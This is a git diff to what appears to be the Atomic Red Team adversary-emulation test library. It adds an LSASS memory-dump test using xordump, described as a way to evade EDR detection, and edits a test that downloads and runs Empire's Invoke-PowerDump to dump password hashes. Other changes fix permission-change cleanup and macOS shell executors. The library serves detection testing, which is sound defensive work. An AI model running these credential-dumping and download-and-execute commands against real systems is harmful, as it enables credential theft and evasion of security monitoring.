diff --git a/Gemfile.lock b/Gemfile.lock
index 96f60456..68078e7a 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -208,14 +208,14 @@ GEM
rb-fsevent (~> 0.10, >= 0.10.3)
rb-inotify (~> 0.9, >= 0.9.10)
mercenary (0.3.6)
- mini_portile2 (2.5.0)
+ mini_portile2 (2.5.1)
minima (2.5.1)
jekyll (>= 3.5, < 5.0)
jekyll-feed (~> 0.9)
jekyll-seo-tag (~> 2.1)
minitest (5.14.2)
multipart-post (2.1.1)
- nokogiri (1.11.1)
+ nokogiri (1.11.4)
mini_portile2 (~> 2.5.0)
racc (~> 1.4)
octokit (4.19.0)
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 8a3b34df..ef068f6f 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -228,6 +228,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid
credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
+credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
@@ -412,7 +413,7 @@ defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution -
defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
defense-evasion,T1553.004,Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
defense-evasion,T1553.004,Install Root Certificate,2,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh
-defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,command_prompt
+defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh
defense-evasion,T1553.004,Install Root Certificate,4,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell
defense-evasion,T1553.004,Install Root Certificate,5,Install root CA on Windows with certutil,5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f,powershell
defense-evasion,T1218.004,InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell
@@ -680,7 +681,7 @@ discovery,T1518.001,Security Software Discovery,5,Security Software Discovery -
discovery,T1518.001,Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
-discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,command_prompt
+discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
discovery,T1497.001,System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv
index 2d4561e6..0aab232a 100644
--- a/atomics/Indexes/Indexes-CSV/macos-index.csv
+++ b/atomics/Indexes/Indexes-CSV/macos-index.csv
@@ -84,7 +84,7 @@ defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500
defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
-defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,command_prompt
+defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash
@@ -133,7 +133,7 @@ discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b3
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
-discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,command_prompt
+discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh
discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 2a0d36ac..aed4c67a 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -26,6 +26,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid
credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
+credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index d9a87458..d3f145a5 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -450,6 +450,7 @@
- Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
- Atomic Test #10: Powershell Mimikatz [windows]
- Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
+ - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.003 NTDS](../../T1003.003/T1003.003.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index d2bd5efb..c3d3acfa 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -50,6 +50,7 @@
- Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
- Atomic Test #10: Powershell Mimikatz [windows]
- Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
+ - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.003 NTDS](../../T1003.003/T1003.003.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 71ce48ba..4b5c3fb2 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -20953,6 +20953,43 @@ credential-access:
& "#{createdump_exe}" -u -f #{output_file} $ID
cleanup_command: 'del #{output_file}
+'
+ name: powershell
+ elevation_required: true
+ - name: Dump LSASS.exe using imported Microsoft DLLs
+ auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
+ description: "The memory of lsass.exe is often dumped for offline credential
+ theft attacks. This can be achieved by\nimporting built-in DLLs and calling
+ exported functions. Xordump will re-read the resulting minidump \nfile and
+ delete it immediately to avoid brittle EDR detections that signature lsass
+ minidump files.\n\nUpon successful execution, you should see the following
+ file created $env:TEMP\\lsass-xordump.t1003.001.dmp.\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ xordump_exe:
+ description: Path to xordump
+ type: Path
+ default: C:\Windows\Temp\xordump.exe
+ output_file:
+ description: Path where resulting dump should be placed
+ type: Path
+ default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
+ dependencies:
+ - description: 'Computer must have xordump.exe
+
+'
+ prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe"
+ -OutFile #{xordump_exe}
+
+'
+ executor:
+ command: "#{xordump_exe} -out #{output_file} -x 0x41\n"
+ cleanup_command: 'Remove-Item ${output_file} -ErrorAction Ignore
+
'
name: powershell
elevation_required: true
@@ -22732,7 +22769,7 @@ credential-access:
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
- Import-Module .\PowerDump.ps1
+ Import-Module "$Env:Temp\PowerDump.ps1"
Invoke-PowerDump
name: powershell
elevation_required: true
@@ -32908,7 +32945,7 @@ defense-evasion:
description: Key we create that is used to create the CA certificate
type: Path
default: rootCA.key
- dependency_executor_name: command_prompt
+ dependency_executor_name: sh
dependencies:
- description: 'Verify the certificate exists. It generates if not on disk.
@@ -32941,7 +32978,7 @@ defense-evasion:
description: Key we create that is used to create the CA certificate
type: Path
default: rootCA.key
- dependency_executor_name: command_prompt
+ dependency_executor_name: sh
dependencies:
- description: 'Verify the certificate exists. It generates if not on disk.
@@ -32957,7 +32994,7 @@ defense-evasion:
"#{cert_filename}"
'
- name: command_prompt
+ name: sh
elevation_required: true
- name: Install root CA on Windows
auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1
@@ -42958,8 +42995,27 @@ defense-evasion:
description: Path of folder to recursively set permissions on
type: path
default: C:\Users\Public\*
+ file_path:
+ description: Path of folder permission back
+ type: Path
+ default: "%temp%\\T1222.001-folder-perms-backup.txt"
+ dependency_executor_name: command_prompt
+ dependencies:
+ - description: 'Backup of original folder permissions should exist (for use
+ in cleanup commands)
+
+'
+ prereq_command: 'IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 )
+
+'
+ get_prereq_command: 'icacls #{path} /save #{file_path} /t /q >nul 2>&1
+
+'
executor:
command: icacls "#{path}" /grant Everyone:F /T /C /Q
+ cleanup_command: 'icacls ''#{path}'' /restore #{file_path} /q >nul 2>&1
+
+'
name: command_prompt
elevation_required: true
T1220:
@@ -48719,7 +48775,7 @@ discovery:
supported_platforms:
- macos
executor:
- name: command_prompt
+ name: sh
elevation_required: false
command: |-
/usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md
index aad552e0..26822e04 100644
--- a/atomics/T1003.001/T1003.001.md
+++ b/atomics/T1003.001/T1003.001.md
@@ -48,6 +48,8 @@ The following SSPs can be used to access credentials:
- [Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe](#atomic-test-11---dump-lsass-with-net-5-createdumpexe)
+- [Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12---dump-lsassexe-using-imported-microsoft-dlls)
+
@@ -564,4 +566,54 @@ echo ".NET 5 must be installed manually." "For the very brave a copy of the exec
+
+
+
+## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs
+The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
+importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
+file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
+
+Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| xordump_exe | Path to xordump | Path | C:\Windows\Temp\xordump.exe|
+| output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass-xordump.t1003.001.dmp|
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+#{xordump_exe} -out #{output_file} -x 0x41
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item ${output_file} -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Computer must have xordump.exe
+##### Check Prereq Commands:
+```powershell
+if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
+```
+
+
+
+
diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml
index 2014b6e2..eb902b08 100644
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -138,6 +138,7 @@ atomic_tests:
del C:\windows\temp\dumpert.dmp >nul 2> nul
name: command_prompt
elevation_required: true
+
- name: Dump LSASS.exe Memory using Windows Task Manager
auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607
description: |
@@ -158,6 +159,7 @@ atomic_tests:
3. Dump lsass.exe memory:
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
name: manual
+
- name: Offline Credential Theft With Mimikatz
auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023
description: |
@@ -354,3 +356,37 @@ atomic_tests:
del #{output_file}
name: powershell
elevation_required: true
+
+- name: Dump LSASS.exe using imported Microsoft DLLs
+ auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
+ description: |
+ The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
+ importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
+ file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
+
+ Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
+ supported_platforms:
+ - windows
+ input_arguments:
+ xordump_exe:
+ description: Path to xordump
+ type: Path
+ default: C:\Windows\Temp\xordump.exe
+ output_file:
+ description: Path where resulting dump should be placed
+ type: Path
+ default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
+ dependencies:
+ - description: |
+ Computer must have xordump.exe
+ prereq_command: |
+ if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
+ executor:
+ command: |
+ #{xordump_exe} -out #{output_file} -x 0x41
+ cleanup_command: |
+ Remove-Item ${output_file} -ErrorAction Ignore
+ name: powershell
+ elevation_required: true
diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md
index d2b817bc..1516c1da 100644
--- a/atomics/T1003.002/T1003.002.md
+++ b/atomics/T1003.002/T1003.002.md
@@ -179,7 +179,7 @@ Executes a hashdump by reading the hasshes from the registry.
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
-Import-Module .\PowerDump.ps1
+Import-Module "$Env:Temp\PowerDump.ps1"
Invoke-PowerDump
```
diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml
index 081107a1..958fac22 100644
--- a/atomics/T1003.002/T1003.002.yaml
+++ b/atomics/T1003.002/T1003.002.yaml
@@ -94,7 +94,7 @@ atomic_tests:
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
- Import-Module .\PowerDump.ps1
+ Import-Module "$Env:Temp\PowerDump.ps1"
Invoke-PowerDump
name: powershell
elevation_required: true
diff --git a/atomics/T1222.001/T1222.001.md b/atomics/T1222.001/T1222.001.md
index 576c3ad0..def6c2c7 100644
--- a/atomics/T1222.001/T1222.001.md
+++ b/atomics/T1222.001/T1222.001.md
@@ -224,6 +224,7 @@ You can set your own path variable to "C:\*" if you prefer.
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path | Path of folder to recursively set permissions on | path | C:\Users\Public\*|
+| file_path | Path of folder permission back | Path | %temp%\T1222.001-folder-perms-backup.txt|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
@@ -233,9 +234,25 @@ You can set your own path variable to "C:\*" if you prefer.
icacls "#{path}" /grant Everyone:F /T /C /Q
```
+#### Cleanup Commands:
+```cmd
+icacls '#{path}' /restore #{file_path} /q >nul 2>&1
+```
+#### Dependencies: Run with `command_prompt`!
+##### Description: Backup of original folder permissions should exist (for use in cleanup commands)
+##### Check Prereq Commands:
+```cmd
+IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 )
+```
+##### Get Prereq Commands:
+```cmd
+icacls #{path} /save #{file_path} /t /q >nul 2>&1
+```
+
+
diff --git a/atomics/T1222.001/T1222.001.yaml b/atomics/T1222.001/T1222.001.yaml
index 4f03b7de..1d80a6f2 100644
--- a/atomics/T1222.001/T1222.001.yaml
+++ b/atomics/T1222.001/T1222.001.yaml
@@ -132,7 +132,21 @@ atomic_tests:
description: Path of folder to recursively set permissions on
type: path
default: 'C:\Users\Public\*'
+ file_path:
+ description: Path of folder permission back
+ type: Path
+ default: '%temp%\T1222.001-folder-perms-backup.txt'
+ dependency_executor_name: command_prompt
+ dependencies:
+ - description: |
+ Backup of original folder permissions should exist (for use in cleanup commands)
+ prereq_command: |
+ IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 )
+ get_prereq_command: |
+ icacls #{path} /save #{file_path} /t /q >nul 2>&1
executor:
command: icacls "#{path}" /grant Everyone:F /T /C /Q
+ cleanup_command: |
+ icacls '#{path}' /restore #{file_path} /q >nul 2>&1
name: command_prompt
- elevation_required: true
\ No newline at end of file
+ elevation_required: true
diff --git a/atomics/T1518/T1518.md b/atomics/T1518/T1518.md
index 5b210391..7925bb5f 100644
--- a/atomics/T1518/T1518.md
+++ b/atomics/T1518/T1518.md
@@ -75,10 +75,10 @@ Adversaries may attempt to get a listing of non-security related software that i
-#### Attack Commands: Run with `command_prompt`!
+#### Attack Commands: Run with `sh`!
-```cmd
+```sh
/usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
/usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist
```
diff --git a/atomics/T1518/T1518.yaml b/atomics/T1518/T1518.yaml
index e42eefd3..c6a329a9 100644
--- a/atomics/T1518/T1518.yaml
+++ b/atomics/T1518/T1518.yaml
@@ -33,7 +33,7 @@ atomic_tests:
supported_platforms:
- macos
executor:
- name: command_prompt
+ name: sh
elevation_required: false
command: |
/usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
diff --git a/atomics/T1553.004/T1553.004.md b/atomics/T1553.004/T1553.004.md
index 43e59df9..c17ef4a6 100644
--- a/atomics/T1553.004/T1553.004.md
+++ b/atomics/T1553.004/T1553.004.md
@@ -90,14 +90,14 @@ echo sudo update-ca-certificates
-#### Dependencies: Run with `command_prompt`!
+#### Dependencies: Run with `sh`!
##### Description: Verify the certificate exists. It generates if not on disk.
##### Check Prereq Commands:
-```cmd
+```sh
if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
-```cmd
+```sh
if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
```
@@ -123,24 +123,24 @@ Creates a root CA with openssl
| key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key|
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
-```cmd
+```sh
sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}"
```
-#### Dependencies: Run with `command_prompt`!
+#### Dependencies: Run with `sh`!
##### Description: Verify the certificate exists. It generates if not on disk.
##### Check Prereq Commands:
-```cmd
+```sh
if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
-```cmd
+```sh
if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
```
diff --git a/atomics/T1553.004/T1553.004.yaml b/atomics/T1553.004/T1553.004.yaml
index d3663bc7..668dc4fe 100644
--- a/atomics/T1553.004/T1553.004.yaml
+++ b/atomics/T1553.004/T1553.004.yaml
@@ -44,7 +44,7 @@ atomic_tests:
description: Key we create that is used to create the CA certificate
type: Path
default: rootCA.key
- dependency_executor_name: command_prompt
+ dependency_executor_name: sh
dependencies:
- description: |
Verify the certificate exists. It generates if not on disk.
@@ -74,7 +74,7 @@ atomic_tests:
description: Key we create that is used to create the CA certificate
type: Path
default: rootCA.key
- dependency_executor_name: command_prompt
+ dependency_executor_name: sh
dependencies:
- description: |
Verify the certificate exists. It generates if not on disk.
@@ -86,7 +86,7 @@ atomic_tests:
executor:
command: |
sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}"
- name: command_prompt
+ name: sh
elevation_required: true
- name: Install root CA on Windows
auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index eba1dedd..d80b426b 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -692,3 +692,4 @@ c75612b2-9de0-4d7c-879c-10d7b077072d
e86f1b4b-fcc1-4a2a-ae10-b49da01458db
10447c83-fc38-462a-a936-5102363b1c43
fcbdd43f-f4ad-42d5-98f3-0218097e2720
+86fc3f40-237f-4701-b155-81c01c48d697